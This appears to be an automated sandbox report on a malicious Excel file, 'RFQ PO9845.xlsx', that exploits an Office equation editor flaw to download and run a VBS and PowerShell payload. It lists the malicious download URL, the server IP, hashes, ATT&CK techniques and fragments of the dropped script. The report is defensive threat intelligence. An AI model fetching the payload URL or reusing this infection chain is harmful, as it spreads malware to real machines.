Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts111
Command and Scripting Interpreter
Path Interception1
Access Token Manipulation
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts211
Scripting
Boot or Logon Initialization Scripts11
Process Injection
1
Modify Registry
LSASS Memory21
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth23
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts23
Exploitation for Client Execution
Logon Script (Windows)Logon Script (Windows)21
Virtualization/Sandbox Evasion
Security Account Manager11
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts2
PowerShell
Logon Script (Mac)Logon Script (Mac)1
Access Token Manipulation
NTDS1
System Network Configuration Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer13
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets2
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common211
Scripting
Cached Domain Credentials14
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items1
Obfuscated Files or Information
DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 891787 Sample: RFQ PO9845.xlsx Startdate: 21/06/2023 Architecture: WINDOWS Score: 100 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 3 other signatures 2->42 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 7 7 2->13         started        process3 dnsIp4 34 ayccubrimientos.com 190.90.160.170, 443, 49183 GTDCOLOMBIASASCO Colombia 8->34 28 C:\Users\user\AppData\Local\...\ewaz[1].vbs, Unicode 8->28 dropped 50 Office equation editor establishes network connection 8->50 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->52 15 wscript.exe 1 8->15         started        30 C:\Users\user\Desktop\~$RFQ PO9845.xlsx, data 13->30 dropped file5 signatures6 process7 signatures8 54 Suspicious powershell command line found 15->54 56 Wscript starts Powershell (via cmd or directly) 15->56 58 Very long command line found 15->58 18 cmd.exe 15->18         started        21 powershell.exe 7 15->21         started        process9 signatures10 44 Wscript starts Powershell (via cmd or directly) 18->44 46 Uses ping.exe to sleep 18->46 48 Uses ping.exe to check the status of other devices and networks 18->48 23 PING.EXE 18->23         started        26 powershell.exe 6 18->26         started        process11 dnsIp12 32 127.0.0.1 unknown unknown 23->32

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
RFQ PO9845.xlsx61%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882
RFQ PO9845.xlsx100%AviraEXP/CVE-2017-11882.Gen
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://ayccubrimientos.com/laz/ewaz.vbs0%Avira URL Cloudsafe
https://ayccubrimientos.com/60%Avira URL Cloudsafe
https://ayccubrimientos.com/laz/ewaz.vbsiiC:0%Avira URL Cloudsafe
https://ayccubrimientos.com/6xa62L~E0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ayccubrimientos.com
190.90.160.170
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://ayccubrimientos.com/laz/ewaz.vbstrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://ayccubrimientos.com/6EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 0000000B.00000003.1118657398.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://www.piriform.com/ccleanerisp9powershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://ocsp.entrust.net03EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://ayccubrimientos.com/6xa62L~EEQNEDT32.EXE, 00000003.00000002.1087109037.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ayccubrimientos.com/laz/ewaz.vbsiiC:EQNEDT32.EXE, 00000003.00000002.1087109037.00000000002EF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.piriform.com/ccleanerpowershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.1118657398.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.piriform.com/ccleaner744Cpowershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.entrust.net0DEQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  190.90.160.170
                  ayccubrimientos.comColombia
                  26619GTDCOLOMBIASASCOtrue
                  IP
                  127.0.0.1
                  Joe Sandbox Version:37.1.0 Beryl
                  Analysis ID:891787
                  Start date and time:2023-06-21 06:24:05 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:RFQ PO9845.xlsx
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winXLSX@12/7@1/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 66
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: RFQ PO9845.xlsx
                  TimeTypeDescription
                  06:25:39API Interceptor98x Sleep call for process: EQNEDT32.EXE modified
                  06:25:44API Interceptor111x Sleep call for process: wscript.exe modified
                  06:25:58API Interceptor52x Sleep call for process: powershell.exe modified
                  No context
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  GTDCOLOMBIASASCOHxZECaqzaM.elfGet hashmaliciousMiraiBrowse
                  • 179.50.6.161
                  RE8pE88rcb.elfGet hashmaliciousUnknownBrowse
                  • 179.50.102.209
                  FtV0FviMeR.elfGet hashmaliciousMiraiBrowse
                  • 190.90.162.1
                  KeGmSPqerk.dllGet hashmaliciousWannacryBrowse
                  • 190.90.217.166
                  b3astmode.arm7Get hashmaliciousMiraiBrowse
                  • 190.90.162.7
                  b3astmode.arm7Get hashmaliciousMiraiBrowse
                  • 190.90.162.9
                  arm-20220323-0742Get hashmaliciousMirai MoobotBrowse
                  • 190.90.162.8
                  switchware.arm6Get hashmaliciousMiraiBrowse
                  • 179.50.88.105
                  MpqBwoD6CmGet hashmaliciousUnknownBrowse
                  • 179.50.120.244
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  7dcce5b76c8b17472d024758970a406bSuntrust_Bank_MT103847594826200623.docx.docGet hashmaliciousSmokeLoaderBrowse
                  • 190.90.160.170
                  Packers_Order.xlsGet hashmaliciousAgentTesla, NSISDropperBrowse
                  • 190.90.160.170
                  Pending_invoice.xlsGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  VAV_PO_2023-24_345.xlsGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  87#U0568.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                  • 190.90.160.170
                  LkviXaVF4T.rtfGet hashmaliciousSmokeLoaderBrowse
                  • 190.90.160.170
                  Suntrust_Bank_MT103847594826190623.docx.docGet hashmaliciousSmokeLoaderBrowse
                  • 190.90.160.170
                  INVOICE_NO._1164667916.docx.docGet hashmaliciousAgentTesla, NSISDropperBrowse
                  • 190.90.160.170
                  List_of_Compromised_Systems.xlsGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  List_of_Compromised_Systems.xlsGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  E-mail.8107345.msiGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  PURCHASE_ORDER.docx.docGet hashmaliciousGuLoaderBrowse
                  • 190.90.160.170
                  Payment_document.docx.docGet hashmaliciousFormBookBrowse
                  • 190.90.160.170
                  Fusion 360 Client Downloader.exeGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  Ach_Remittance_advice.xlsxGet hashmaliciousHTMLPhisherBrowse
                  • 190.90.160.170
                  SHIPPING_DOCUMENTS.docx.docGet hashmaliciousLokibotBrowse
                  • 190.90.160.170
                  PURCHASE_ORDER.docx.docGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  m8CWd1c3Fa.docxGet hashmaliciousRemcosBrowse
                  • 190.90.160.170
                  RO10098.docx.docGet hashmaliciousRemcosBrowse
                  • 190.90.160.170
                  29trxd5c012976cebc44375f96945dffc73ba.xlsxGet hashmaliciousUnknownBrowse
                  • 190.90.160.170
                  No context
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):411960
                  Entropy (8bit):3.820434235277348
                  Encrypted:false
                  SSDEEP:1536:aQvgYcpa5U+ogsUJW4Wrle/PhG+/kery+bGfDoWF2LiMreSLv1ihDfgK+oUG+G/k:9gYcpl+og0S7WF35So9h+djxgPnZqem
                  MD5:581B72AF977E00E681C7AA1B147A41DE
                  SHA1:1F54A1E94F3B8FAE246F9C2F896FCE825BA2975C
                  SHA-256:1ECCF7FFF916F824D46612BF8DEA754A6CBCDA3777DC692AE1FD92A6C8F9D227
                  SHA-512:BBD5643F4EA050FA856A7DF833E16CEE9906253773CA291656ADCF0AB7B14648E26D9209042B6A3CC528AD7004CE2059A552A978231DAA1E7C6A09701376EB1D
                  Malicious:true
                  Reputation:low
                  Preview:.. . . . . . . ..... .O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t.....'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. . . . .....p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .G.e.t.S.u.f.f.i.x.(.r.e.s.U.r.i.)..... . . . .A.S.S.E.R.T.B.O.O.L. .L.e.n.(.r.e.s.U.r.i.). .<.>. .0.,. .G.e.t.R.e.s.o.u.r.c.e.(.".k.c.x.x.".)......... . . . .G.e.t.S.u.f.f.i.x. .=. ."._.I.N.P.U.T.".....e.n.d. .f.u.n.c.t.i.o.n.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. . . . .....'. .Q.u.i.c.k.C.o.n.f.i.g. .h.e.l.p.e.r.....P.r.i.v.a.t.e. .F.u.n.c.t.i.o.n. .Q.u.i.c.k.C.o.n.f.i.g.(.s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.)..... . . . .Q.u.i.c.k.C.o.n.f.i.g.R.e.m.o.t.i.n.g. .s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.,. .t.r.u.e..... . . . .I.f. .E.r.r...N.u.m.b.e.r. .<.>. .0. .T.h.e.n..... . . . . . . . .E.x.i.t. .F.u.n.c.t.i.o.n..... . . . .E.n.d. .I.f..... . . . .Q.u.i.c.k.C.o.n.f.i.g.R.e.m.o.t.i.n.g. .s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.,. .f.a.l.s.e.....E.n.d. .f.u.n.c.t.i.o.n.........P.r.i.v.a.t.e. .F.u.n.
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584178557749453
                  Encrypted:false
                  SSDEEP:96:chQCIMqzqvsqvJCwovMz8hQCIMqzqvsEHyqvJCworxMzqrKrGHAMklw9lUVVMVn:cu+ovMz8uWHnorxMzqWZMklwoMVn
                  MD5:DC6C2AF4F2CBC7205AC054BB10AEE57B
                  SHA1:25D073960CE2D9754805FC5BD7D9E28BEC7ADF05
                  SHA-256:178CC10F906854606FDF2009CD28AAD59CF37F6B347699991FC31570EC2A3425
                  SHA-512:D5A40AF193F9A5A32FB761F0BA3B1723B630528EE960030FD42B64404D7362B0C71BB503F57DED064D885DAC973094952103B197F43099DE5A46C1183085C097
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584178557749453
                  Encrypted:false
                  SSDEEP:96:chQCIMqzqvsqvJCwovMz8hQCIMqzqvsEHyqvJCworxMzqrKrGHAMklw9lUVVMVn:cu+ovMz8uWHnorxMzqWZMklwoMVn
                  MD5:DC6C2AF4F2CBC7205AC054BB10AEE57B
                  SHA1:25D073960CE2D9754805FC5BD7D9E28BEC7ADF05
                  SHA-256:178CC10F906854606FDF2009CD28AAD59CF37F6B347699991FC31570EC2A3425
                  SHA-512:D5A40AF193F9A5A32FB761F0BA3B1723B630528EE960030FD42B64404D7362B0C71BB503F57DED064D885DAC973094952103B197F43099DE5A46C1183085C097
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584178557749453
                  Encrypted:false
                  SSDEEP:96:chQCIMqzqvsqvJCwovMz8hQCIMqzqvsEHyqvJCworxMzqrKrGHAMklw9lUVVMVn:cu+ovMz8uWHnorxMzqWZMklwoMVn
                  MD5:DC6C2AF4F2CBC7205AC054BB10AEE57B
                  SHA1:25D073960CE2D9754805FC5BD7D9E28BEC7ADF05
                  SHA-256:178CC10F906854606FDF2009CD28AAD59CF37F6B347699991FC31570EC2A3425
                  SHA-512:D5A40AF193F9A5A32FB761F0BA3B1723B630528EE960030FD42B64404D7362B0C71BB503F57DED064D885DAC973094952103B197F43099DE5A46C1183085C097
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584178557749453
                  Encrypted:false
                  SSDEEP:96:chQCIMqzqvsqvJCwovMz8hQCIMqzqvsEHyqvJCworxMzqrKrGHAMklw9lUVVMVn:cu+ovMz8uWHnorxMzqWZMklwoMVn
                  MD5:DC6C2AF4F2CBC7205AC054BB10AEE57B
                  SHA1:25D073960CE2D9754805FC5BD7D9E28BEC7ADF05
                  SHA-256:178CC10F906854606FDF2009CD28AAD59CF37F6B347699991FC31570EC2A3425
                  SHA-512:D5A40AF193F9A5A32FB761F0BA3B1723B630528EE960030FD42B64404D7362B0C71BB503F57DED064D885DAC973094952103B197F43099DE5A46C1183085C097
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT...Programs..f.......:..hT.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):411960
                  Entropy (8bit):3.820434235277348
                  Encrypted:false
                  SSDEEP:1536:aQvgYcpa5U+ogsUJW4Wrle/PhG+/kery+bGfDoWF2LiMreSLv1ihDfgK+oUG+G/k:9gYcpl+og0S7WF35So9h+djxgPnZqem
                  MD5:581B72AF977E00E681C7AA1B147A41DE
                  SHA1:1F54A1E94F3B8FAE246F9C2F896FCE825BA2975C
                  SHA-256:1ECCF7FFF916F824D46612BF8DEA754A6CBCDA3777DC692AE1FD92A6C8F9D227
                  SHA-512:BBD5643F4EA050FA856A7DF833E16CEE9906253773CA291656ADCF0AB7B14648E26D9209042B6A3CC528AD7004CE2059A552A978231DAA1E7C6A09701376EB1D
                  Malicious:false
                  Preview:.. . . . . . . ..... .O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t.....'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. . . . .....p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .G.e.t.S.u.f.f.i.x.(.r.e.s.U.r.i.)..... . . . .A.S.S.E.R.T.B.O.O.L. .L.e.n.(.r.e.s.U.r.i.). .<.>. .0.,. .G.e.t.R.e.s.o.u.r.c.e.(.".k.c.x.x.".)......... . . . .G.e.t.S.u.f.f.i.x. .=. ."._.I.N.P.U.T.".....e.n.d. .f.u.n.c.t.i.o.n.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'. . . . .....'. .Q.u.i.c.k.C.o.n.f.i.g. .h.e.l.p.e.r.....P.r.i.v.a.t.e. .F.u.n.c.t.i.o.n. .Q.u.i.c.k.C.o.n.f.i.g.(.s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.)..... . . . .Q.u.i.c.k.C.o.n.f.i.g.R.e.m.o.t.i.n.g. .s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.,. .t.r.u.e..... . . . .I.f. .E.r.r...N.u.m.b.e.r. .<.>. .0. .T.h.e.n..... . . . . . . . .E.x.i.t. .F.u.n.c.t.i.o.n..... . . . .E.n.d. .I.f..... . . . .Q.u.i.c.k.C.o.n.f.i.g.R.e.m.o.t.i.n.g. .s.e.s.s.i.o.n.,. .c.m.d.l.i.n.e.O.p.t.i.o.n.s.,. .f.a.l.s.e.....E.n.d. .f.u.n.c.t.i.o.n.........P.r.i.v.a.t.e. .F.u.n.
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                  MD5:797869BB881CFBCDAC2064F92B26E46F
                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                  Malicious:true
                  Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  File type:Microsoft Excel 2007+
                  Entropy (8bit):7.995829580705893
                  TrID:
                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                  • ZIP compressed archive (8000/1) 16.67%
                  File name:RFQ PO9845.xlsx
                  File size:3672062
                  MD5:8525d7dfb6d2b57d88e917b1a31f2a4c
                  SHA1:7aa5e1f3cbf790a22112504cb724618685185102
                  SHA256:43e75fa222a5601992a5c49d5b1372db2d13d0963fa0f1a45885d2daacd53850
                  SHA512:0c7f5f62a7b7ae2292743428399321adf88a9af5b59a05df2c0f0e7c5a73de2431eec3c405932f5693a5e8b11195f82afe812d942a3ae5cabc28ef2bd138156c
                  SSDEEP:98304:Bdm2sAtNWvsk6lWl7Xgwfr0DCY5vqPWzOFYMl39xlRRtHG:fX1tNWUTi7Pfr0v5vEWzOFYuvRtm
                  TLSH:2206332C24F526ECCD78C7BE82F01539B642F13F4CA245E2D9397624F5E1E3A898D895
                  File Content Preview:PK...........V.w..............[Content_Types].xmlUT......d...d...d.U.N.1......^.[Pc.a...QH..(..V.m......E.1..H......Lwg...W..AB.|!:y[d.u0.O..........F.....@....t...0c..B.D.FJ.%T......8.J.....JO...y.}%u...ZTs.^.....Qv?......".]..R.P1:.....y.C...c....V1$..@
                  Icon Hash:2562ab89a7b7bfbf
                  Document Type:OpenXML
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:
                  Encrypted Document:False
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:False
                  Author:
                  Last Saved By:
                  Create Time:2022-07-28T11:45:17Z
                  Last Saved Time:2023-06-02T05:29:55Z
                  Creating Application:
                  Security:0
                  Thumbnail Scaling Desired:false
                  Company:
                  Contains Dirty Links:false
                  Shared Document:false
                  Changed Hyperlinks:false
                  Application Version:16.0300
                  General
                  Stream Path:\x1Ole10NAtiVe
                  File Type:data
                  Stream Size:3629531
                  Entropy:7.994613902613489
                  Base64 Encoded:True
                  Data ASCII:4 . . . w . . . { . ] M 1 1 . . . * V . . - 1 _ A . L @ ] . W I . f I . R . . X % 1 . * T 3 f . A # U p . d ? * . 1 P P v f Q . 4 ` . O ! . 1 . . . P _ ~ ( . Y D G s ? ] . r ! . . . ! r 5 X e . . ] 4 } * J j Z . A A , a . h X . . _ . . . i . . ` > V k . e 3 / . . s 2 Y + . . . y . . 3 . . k \\ . . 9 . # S , Z : c ; ! 7 z ' . N | ^ N . . C . * B . . . . . k p 4 t * . h f 1 ! X . > . . $ b a X = J ) o . E w . ` t 5 . ] } ' $ . U i . 0 . . J . D t P ^ n . : H 2 x ^ . k # % q O 6 x ~ Y . % H ; B W . . S 7 R
